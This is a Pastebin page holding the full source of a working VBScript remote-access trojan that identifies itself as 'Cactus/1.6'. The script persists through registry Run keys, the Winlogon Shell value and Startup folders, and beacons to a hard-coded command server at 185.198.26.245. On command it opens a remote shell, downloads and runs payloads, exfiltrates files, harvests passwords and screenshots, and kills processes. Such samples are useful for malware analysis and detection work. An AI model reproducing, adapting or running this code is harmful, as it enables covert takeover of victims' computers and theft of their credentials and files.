API tools faq
paste
Racco42

Untitled

Racco42
Feb 28th, 2019
1,886
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.18 KB | None | 0 0
raw download clone embed print report
  1. On Error Resume Next
  2. Randomize
  3. Host = "185.198.26.245"
  4. Port = 8879
  5. wTime = 1500
  6. VER = "1.6"
  7. cName = "asw"
  8. Set oWSH = CreateObject("WScript.Shell")
  9. Set oFSO = CreateObject("Scripting.FileSystemObject")
  10. Set oINT = CreateObject("MSXML2.xmlHTTP")
  11. Dim mutex
  12. WScript.Timeout = 0
  13. SelfPath = WScript.ScriptFullName
  14. SelfName = WScript.ScriptName
  15. SetupDir = oWSH.ExpandEnvironmentStrings("%APPDATA%") & "\"
  16. Startup1 = oWSH.SpecialFolders("Startup") & "\"
  17. Startup2 = oWSH.SpecialFolders("AllUsersStartup") & "\"
  18. SetInstance
  19. Do
  20. TTT = Speak("waiting",wTime)
  21. RES = Split(TTT, "{*}")
  22. If UBound(RES) = -1 Then
  23. WScript.Sleep 5000
  24. else
  25. Select Case RES(0)
  26. Case "sleep"
  27. wTime = RES(1)
  28. Case "stop"
  29. Speak "offline",""
  30. WScript.Quit
  31. Case "tasklist"
  32. Speak "tasklist",TaskList
  33. Case "getdrives"
  34. Speak "getdrives",GetDrives
  35. Case "getfiles"
  36. Speak "getfiles",GetFiles(RES(1))
  37. Case "taskkill"
  38. oWSH.Run "taskkill /T /F /IM " & chr(34) & RES(1) & chr(34), 0, True
  39. Speak "taskkill",""
  40. Case "voice"
  41. CreateObject("SAPI.SpVoice").Speak RES(1)
  42. Speak "voice",""
  43. Case "opencd"
  44. OpenCD
  45. Speak "opencd",""
  46. Case "openweb"
  47. oWSH.Run RES(1)
  48. Speak "openweb",""
  49. Case "getservices"
  50. Speak "getservices",GetServices
  51. Case "uninstall"
  52. Call Uninstall
  53. Case "remoteshell"
  54. Speak "remoteshell",RemoteShell(RES(1))
  55. Case "reset"
  56. mutex.Close
  57. oWSH.Run "wscript.exe //B " & chr(34) & SetupDir & SelfName & Chr(34)
  58. Speak "reset",""
  59. WScript.Quit
  60. Case "exefile"
  61. oWSH.Run chr(34) & Trim(RES(1)) & chr(34)
  62. Speak "exefile",""
  63. Case "mkdir"
  64. oFSO.CreateFolder Trim(RES(1))
  65. Speak "mkdir",""
  66. Case "killfile"
  67. oFSO.DeleteFile Trim(RES(1))
  68. oFSO.DeleteFolder Trim(RES(1))
  69. Speak "killfile",""
  70. Case "getparent"
  71. Speak "getfiles",GetFiles(oFSO.GetParentFolderName(RES(1)))
  72. Case "downrun"
  73. DownRun RES(1),RES(2)
  74. Speak "downrun",""
  75. Case "update"
  76. mutex.Close
  77. set mutex = oFSO.OpenTextFile(SetupDir & SelfName, 2, False)
  78. mutex.write fileDecode(RES(1))
  79. mutex.Close
  80. Speak "",""
  81. Speak "update",""
  82. oWSH.Run "wscript.exe //B " & chr(34) & SetupDir & SelfName & Chr(34)
  83. WScript.Quit
  84. Case "sendfile"
  85. SendFile(Trim(RES(1)))
  86. Case "recvfile"
  87. RecvFile(RES(1))
  88. Speak "",""
  89. If InStr(RES(1),"|plug|") > 0 Then
  90. Speak "plugin-ok",""
  91. Else
  92. Speak "recvfile",""
  93. End If
  94. Case "uprun"
  95. UpRun(RES(1))
  96. Speak "",""
  97. Speak "uprun",""
  98. Case "netstart"
  99. oWSH.Run "net start " & Trim(RES(1)),0
  100. Speak "netstart",""
  101. Case "netstop"
  102. oWSH.Run "net stop " & Trim(RES(1)),0
  103. Speak "netstop",""
  104. Case "renfile"
  105. Set tFile = oFSO.GetFile(Trim(RES(1)))
  106. tFile.Name = Trim(RES(2))
  107. Speak "renfile",""
  108. Case "rendir"
  109. Set tFolder = oFSO.GetFolder(Trim(RES(1)))
  110. tFolder.Name = Trim(RES(2))
  111. Speak "rendir",""
  112. Case "runvbs"
  113. execute fileDecode(RES(1))
  114. Speak "runvbs",""
  115. Case "shutdown"
  116. oWSH.Run "shutdown /s /f /t 00"
  117. Speak "shutdown",""
  118. Case "reboot"
  119. oWSH.Run "shutdown /r /f /t 00"
  120. Speak "reboot",""
  121. Case "takescreen"
  122. TakeScreen
  123. Case "msgbox"
  124. fBox(RES(1))
  125. Case "getpwd"
  126. GetPWD
  127. End Select
  128. WScript.Sleep Eval(wTime)
  129. End If
  130. Loop
  131. Function Speak(A, B)
  132. On Error Resume Next
  133. oINT.Open "post", "http://" & Host & ":" & Port , False
  134. oINT.setRequestHeader "User-Agent", "Cactus/1.6"
  135. oINT.Send "::" & ClientInfo & "::" & A & "::" & fileEncode(B) & "::<:end:>"
  136. Speak = oINT.ResponseText
  137. End Function
  138. Function SetInstance
  139. On Error Resume Next
  140. oWSH.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(SelfName,".")(0), "wscript.exe //B " & chrw(34) & SetupDir & SelfName & chrw(34)
  141. oWSH.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(SelfName,".")(0), "wscript.exe //B " & chrw(34) & SetupDir & SelfName & chrw(34)
  142. oWSH.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & Split(SelfName,".")(0), "wscript.exe //B " & chrw(34) & SetupDir & SelfName & chrw(34)
  143. oWSH.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe, " & "wscript.exe //B " & chrw(34) & SetupDir & SelfName & chrw(34)
  144. Err.Clear
  145. oFSO.CopyFile SelfPath, SetupDir & SelfName, True
  146. oFSO.CopyFile SelfPath, Startup1 & SelfName, True
  147. oFSO.CopyFile SelfPath, Startup2 & SelfName, True
  148. If err.number > 0 Then WScript.Quit
  149. set SFNS = oFSO.GetFile(SelfPath)
  150. set IFNS = oFSO.GetFile(SetupDir & SelfName)
  151. If LCase(SFNS.ShortPath) <> LCase(IFNS.ShortPath) Then
  152. oWSH.Run "wscript.exe //B " & chr(34) & SetupDir & SelfName & Chr(34)
  153. WScript.Quit
  154. End If
  155. Set mutex = oFSO.OpenTextFile(SetupDir & SelfName, 8, False)
  156. End Function
  157. Function Uninstall
  158. On Error Resume Next
  159. mutex.Close
  160. oWSH.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(SelfName,".")(0)
  161. oWSH.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(SelfName,".")(0)
  162. oWSH.RegDelete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & Split(SelfName,".")(0)
  163. oWSH.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe"
  164. oFSO.DeleteFile SetupDir & SelfName, True
  165. oFSO.DeleteFile Startup1 & SelfName, True
  166. oFSO.DeleteFile Startup2 & SelfName, True
  167.  
  168. Speak "uninstalled",""
  169. WScript.Quit
  170. End Function
  171. Function ClientInfo
  172. On Error Resume Next
  173. tmp = ""
  174. tmp = tmp & userID & "(*)"
  175. tmp = tmp & oWSH.ExpandEnvironmentStrings("%USERNAME%") & "(*)"
  176. tmp = tmp & oWSH.ExpandEnvironmentStrings("%COMPUTERNAME%") & "(*)"
  177. tmp = tmp & osName & "(*)"
  178. tmp = tmp & VER & "(*)"
  179. tmp = tmp & osAV & "(*)"
  180. tmp = tmp & Day(Now) & "/" & Month(Now) & "/" & Year(Now) & " " & Hour(Now) & ":" & Minute(Now) & ":" & Second(Now)
  181. ClientInfo = tmp
  182. End Function
  183. Function userID
  184. On Error Resume Next
  185. usrStr = oWSH.ExpandEnvironmentStrings("%USERNAME%") & oWSH.ExpandEnvironmentStrings("%COMPUTERNAME%")
  186. Set WMI = GetObject("winmgmts:\\.\root\cimv2")
  187. set D1 = WMI.ExecQuery ("select * from win32_logicaldisk")
  188. for each D2 in D1
  189. if D2.VolumeSerialNumber <> "" then
  190. H = D2.VolumeSerialNumber
  191. exit for
  192. end if
  193. next
  194. tmp = ""
  195. usrStr = H & usrStr
  196. for i = 1 to Len(usrStr)
  197. tmp = tmp & Hex(Oct(Asc(Mid(usrStr,i,1))))
  198. next
  199. if Len(tmp) > 15 then tmp = Left(tmp,15)
  200. userID = cName & "_" & tmp
  201. End Function
  202. Function osName
  203. On Error Resume Next
  204. Set WMI = GetObject("winmgmts:\\.\root\cimv2")
  205. set O1 = WMI.execquery ("select * from win32_operatingsystem")
  206. tmp = ""
  207. for each O2 in O1
  208. tmp = Trim(O2.caption)
  209. exit for
  210. next
  211. osName = tmp
  212. End Function
  213. Function osAV
  214. On Error Resume Next
  215. osAV = ""
  216. Set WMI = getobject("winmgmts:\\.\root\cimv2")
  217. Set P = WMI.execquery("SELECT * from win32_operatingsystem",,48)
  218. For Each C In P
  219. osVer = Split(C.version,".")(0)
  220. Next
  221. If osVer > 5 Then tmp = "securitycenter2" Else tmp = "securitycenter"
  222. Set WMI2 = getobject("winmgmts:\\localhost\root\" & tmp)
  223. Set Q = WMI2.execquery("SELECT * from antivirusproduct","wql",0)
  224. For Each W In Q
  225. osAV = osAV & W.displayname & "+"
  226. Next
  227. If osAV = "" Then osAV = "Not Found+"
  228. osAV = Mid(osAV, 1, Len(osAV) - 1)
  229. End Function
  230. Function TaskList
  231. On Error Resume Next
  232. set WMI = getobject("winmgmts:\\.\root\cimv2")
  233. set P1 = WMI.execquery("select * from win32_process",,48)
  234. tmp = ""
  235. for each P2 in P1
  236. tmp = tmp & P2.Name & "|"
  237. tmp = tmp & P2.ExecutablePath & "|"
  238. tmp = tmp & P2.ProcessID & "<>"
  239. next
  240. TaskList = tmp
  241. End function
  242. Function GetDrives
  243. On Error Resume Next
  244. GetDrives = ""
  245. For Each drive In oFSO.drives
  246. If drive.isready = True Then
  247. GetDrives = GetDrives & drive.path & "|" & drive.drivetype & "<>"
  248. End If
  249. Next
  250. End Function
  251. Function GetFiles(D)
  252. On Error Resume Next
  253. GetFiles = D & "<>"
  254. For Each folder In oFSO.getfolder(D).subfolders
  255. GetFiles = GetFiles & folder.name & "|" & "<DIR>" & "|" & "d" & "|" & folder.attributes & "<>"
  256. Next
  257. For Each file In oFSO.getfolder(D).files
  258. GetFiles = GetFiles & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & "<>"
  259. Next
  260. End Function
  261. Function OpenCD
  262. On Error Resume Next
  263. For Each D in oFSO.Drives
  264. WScript.sleep 50
  265. If D.DriveType = 4 Then CreateObject("Shell.Application").Namespace(17).ParseName(D.DriveLetter & ":\").InvokeVerb("Eject")
  266. Next
  267. End Function
  268. Function GetServices
  269. On Error Resume Next
  270. GetServices = ""
  271. Set WMI = GetObject("winmgmts:\\.\root\CIMV2")
  272. Set P = WMI.ExecQuery("SELECT * FROM Win32_Service", "WQL", &h10 + &h20)
  273. For Each objItem In P
  274. GetServices = GetServices & objItem.Name & "|" & objItem.Caption & "|" & objItem.PathName & "|" & objItem.StartMode & "|" & objItem.State & "<>"
  275. Next
  276. End Function
  277. Function RemoteShell(C)
  278. On Error Resume Next
  279. Set xCMD = oWSH.exec("%comspec% /c " & C)
  280. If Not xCMD.stdOut.AtendOfStream Then
  281. R = xCMD.stdOut.ReadAll
  282. ElseIf Not xCMD.stdErr.AtendOfStream Then
  283. R = xCMD.stdErr.ReadAll
  284. else
  285. R = "<error>"
  286. end if
  287. RemoteShell = R
  288. End Function
  289. Function DownRun(x,y)
  290. On Error Resume Next
  291. Set oHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
  292. Set oStream = CreateObject("ADODB.Stream")
  293. oHTTP.Open "GET", x, False
  294. oHTTP.Send
  295. T = oWSH.ExpandEnvironmentStrings("%TMP%") & "\" & oFSO.GetTempName & "." & y
  296. If (oHTTP.Status = 200) Then
  297. oStream.Open
  298. oStream.Type = 1
  299. oStream.Write oHTTP.ResponseBody
  300. oStream.SaveToFile T, 2
  301. oStream.Close
  302. End If
  303. oWSH.Run oFSO.GetFile(T).ShortPath
  304. End Function
  305. Function UpRun(A)
  306. On Error Resume Next
  307. T = Split(A,"<>")
  308. fUpRun = oWSH.ExpandEnvironmentStrings("%TMP%") & "\" & T(0)
  309. Set objXML = CreateObject("MSXml2.DOMDocument")
  310. Set objDocElem = objXML.createElement("Base64Data")
  311. objDocElem.dataType = "bin.base64"
  312. objDocElem.Text = T(1)
  313. Set objStream = CreateObject("ADODB.Stream")
  314. objStream.Type = 1
  315. objStream.Open
  316. objStream.Write objDocElem.nodeTypedValue
  317. objStream.SaveToFile fUpRun, 2
  318. oWSH.Run chr(34) & fUpRun & chr(34)
  319. End Function
  320. Function RecvFile(A)
  321. On Error Resume Next
  322. T = Split(A,"<>")
  323. Set objXML = CreateObject("MSXml2.DOMDocument")
  324. Set objDocElem = objXML.createElement("Base64Data")
  325. objDocElem.dataType = "bin.base64"
  326. objDocElem.Text = T(2)
  327. Set objStream = CreateObject("ADODB.Stream")
  328. objStream.Type = 1
  329. objStream.Open
  330. objStream.Write objDocElem.nodeTypedValue
  331. If T(0) = "|plug|" Then
  332. objStream.SaveToFile SetupDir & T(1), 2
  333. Else
  334. objStream.SaveToFile T(0) & T(1), 2
  335. End If
  336. End Function
  337. Function SendFile(A)
  338. On Error Resume Next
  339. Set objStream = CreateObject("ADODB.Stream")
  340. objStream.Type = 1
  341. objStream.Open()
  342. objStream.LoadFromFile(A)
  343. Set objXML = CreateObject("MSXml2.DOMDocument")
  344. Set objDocElem = objXML.createElement("Base64Data")
  345. objDocElem.dataType = "bin.base64"
  346. objDocElem.nodeTypedValue = objStream.Read()
  347. B = objDocElem.text
  348. oINT.Open "post", "http://" & Host & ":" & Port , False
  349. oINT.Send "::" & ClientInfo & "::sendfile::" & A & "<>" & B & "::<:end:>"
  350. End Function
  351. Function TakeScreen
  352. On Error Resume Next
  353. oWSH.Run SetupDir & "scr-plugin.exe"
  354. For i = 1 to 10
  355. If oFSO.FileExists(SetupDir & "scr-plugin.jpg") = True Then
  356. wTime = 1
  357. SendFile(SetupDir & "scr-plugin.jpg")
  358. oFSO.DeleteFile(SetupDir & "scr-plugin.jpg")
  359. Exit Function
  360. Else
  361. WScript.Sleep 500
  362. End If
  363. Next
  364. Speak "no-scr",""
  365. End Function
  366. Function GetPWD
  367. On Error Resume Next
  368. If oFSO.FileExists(SetupDir & "pwd-plugin.exe") = True Then
  369. oWSH.Run SetupDir & "pwd-plugin.exe"
  370. For i = 1 to 10
  371. If oFSO.FileExists(SetupDir & "pwd-plugin.txt") = True Then
  372. SendFile(SetupDir & "pwd-plugin.txt")
  373. oFSO.DeleteFile(SetupDir & "pwd-plugin.txt")
  374. Exit Function
  375. Else
  376. WScript.Sleep 500
  377. End If
  378. Next
  379. Speak "error-pwd",""
  380. Else
  381. Speak "no-pwd",""
  382. End If
  383. End Function
  384. Function fBox(A)
  385. On Error Resume Next
  386. If oFSO.FileExists(SetupDir & "adv-plugin.exe") = True Then
  387. oWSH.Run "taskkill /T /F /IM adv-plugin.exe", 0, True
  388. WScript.Sleep 100
  389. oWSH.Run SetupDir & "adv-plugin.exe " & A
  390. Speak "msgbox",""
  391. Else
  392. Speak "no-adv",""
  393. End If
  394. End Function
  395. Function fileEncode(A)
  396. T = ""
  397. For i = 1 To Len(A)
  398. T = T & Asc(Mid(A, i, 1)) & "|"
  399. Next
  400. fileEncode = T
  401. End Function
  402. Function fileDecode(A)
  403. C = ""
  404. B = Split(A,"|")
  405. For i = 0 to Ubound(B) -1
  406. C = C & Chr(B(i))
  407. Next
  408. fileDecode = C
  409. End Function
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!